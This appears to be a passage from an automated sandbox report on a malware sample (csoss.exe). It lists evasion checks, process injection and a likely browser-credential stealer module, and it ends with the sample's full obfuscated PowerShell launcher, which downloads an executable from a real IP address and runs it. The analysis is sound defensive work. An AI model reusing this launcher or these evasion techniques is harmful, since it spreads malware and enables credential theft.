                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Switches to a custom stack to bypass stack traces
                    Source: C:\Users\user\AppData\Roaming\csoss.exeAPI/Special instruction interceptor: Address: FE34DC
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: csoss.exe, 00000006.00000003.1385570784.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1388243431.0000000001031000.00000004.00000020.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1388318675.0000000001031000.00000004.00000020.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1388494064.0000000001031000.00000004.00000020.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1385921226.0000000001031000.00000004.00000020.00020000.00000000.sdmp, csoss.exe, 00000006.00000002.1398978472.0000000001031000.00000004.00000020.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1387959668.0000000001031000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeWindow / User API: threadDelayed 7234Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7100Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2393Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\43swuu3x\43swuu3x.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\csoss.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_6-105247
                    Source: C:\Users\user\AppData\Roaming\csoss.exeAPI coverage: 4.4 %
                    Source: C:\Windows\SysWOW64\mshta.exe TID: 6972Thread sleep count: 7234 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3276Thread sleep count: 7100 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1956Thread sleep count: 2393 > 30Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3268Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6445A GetFileAttributesW,FindFirstFileW,FindClose,6_2_00D6445A
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6C6D1 FindFirstFileW,FindClose,6_2_00D6C6D1
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_00D6C75C
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00D6EF95
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00D6F0F2
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00D6F3F3
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00D637EF
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D63B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00D63B12
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D6BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00D6BCBC
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,6_2_00D049A0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: mshta.exe, 00000000.00000002.2509520433.0000000005F60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.1404161874.0000000006D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}K
                    Source: csoss.exe, 00000006.00000003.1388207507.0000000001151000.00000004.00000020.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1388207507.0000000001132000.00000004.00000020.00020000.00000000.sdmp, csoss.exe, 00000006.00000003.1388297635.0000000001151000.00000004.00000020.00020000.00000000.sdmp, acrorrheuma.6.drBinary or memory string: WR_HGfSGVWXMWGD3
                    Source: powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.1404429717.0000000006D66000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1413448646.0000000007CEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: powershell.exe, 00000003.00000002.1400376615.00000000047B7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                    Source: powershell.exe, 00000003.00000002.1413448646.0000000007C72000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: csoss.exe, 00000006.00000003.1387959668.0000000001031000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe
                    Source: RegSvcs.exe, 00000007.00000002.2508024337.00000000005A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\csoss.exeAPI call chain: ExitProcess graph end nodegraph_6-104262
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0096C168 LdrInitializeThunk,LdrInitializeThunk,7_2_0096C168
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D73F09 BlockInput,6_2_00D73F09
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D03B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_00D03B3A
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D35A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,6_2_00D35A7C
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D04B37 LoadLibraryA,GetProcAddress,6_2_00D04B37
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00FE20E8 mov eax, dword ptr fs:[00000030h]6_2_00FE20E8
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00FE37A8 mov eax, dword ptr fs:[00000030h]6_2_00FE37A8
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00FE3748 mov eax, dword ptr fs:[00000030h]6_2_00FE3748
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,6_2_00D580A9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D2A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00D2A155
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D2A124 SetUnhandledExceptionFilter,6_2_00D2A124
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell decode and execute
                    Source: Yara matchFile source: amsi32_5308.amsi.csv, type: OTHER
                    .NET source code references suspicious native API functions
                    Source: 6.2.csoss.exe.eb0000.1.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                    Source: 6.2.csoss.exe.eb0000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                    Source: 6.2.csoss.exe.eb0000.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\AppData\Roaming\csoss.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Roaming\csoss.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 3F8008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D587B1 LogonUserW,6_2_00D587B1
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D03B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,6_2_00D03B3A
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,6_2_00D048D7
                    Source: C:\Users\user\AppData\Roaming\csoss.exeCode function: 6_2_00D64C53 mouse_event,6_2_00D64C53
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwErsHeLl.exe -eX bYPasS -NOP -w 1 -C DEVICEcrEDeNtIaLDePLoyMEnt ; iEx($(IEX('[SYstEM.TEXT.encOdInG]'+[ChaR]0x3a+[CHAR]0X3A+'UtF8.geTsTRinG([SyStEm.ConVert]'+[cHAr]0x3a+[ChaR]58+'frOmBAsE64striNg('+[CHar]34+'JEdhICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlcmRFRmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1vbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ1dRaXBNREdkcixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamdrLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFaXpjTUh2dkJaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiVEdORG9HcUNLRyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWR1ZhbyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRHYTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOC8xMjAvY3Nvc3MuZXhlIiwiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSIsMCwwKTtzVGFyVC1zbEVFcCgzKTtJblZvS0UtaXRFTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGNzb3NzLmV4ZSI='+[cHar]0x22+'))')))"Jump to behavior
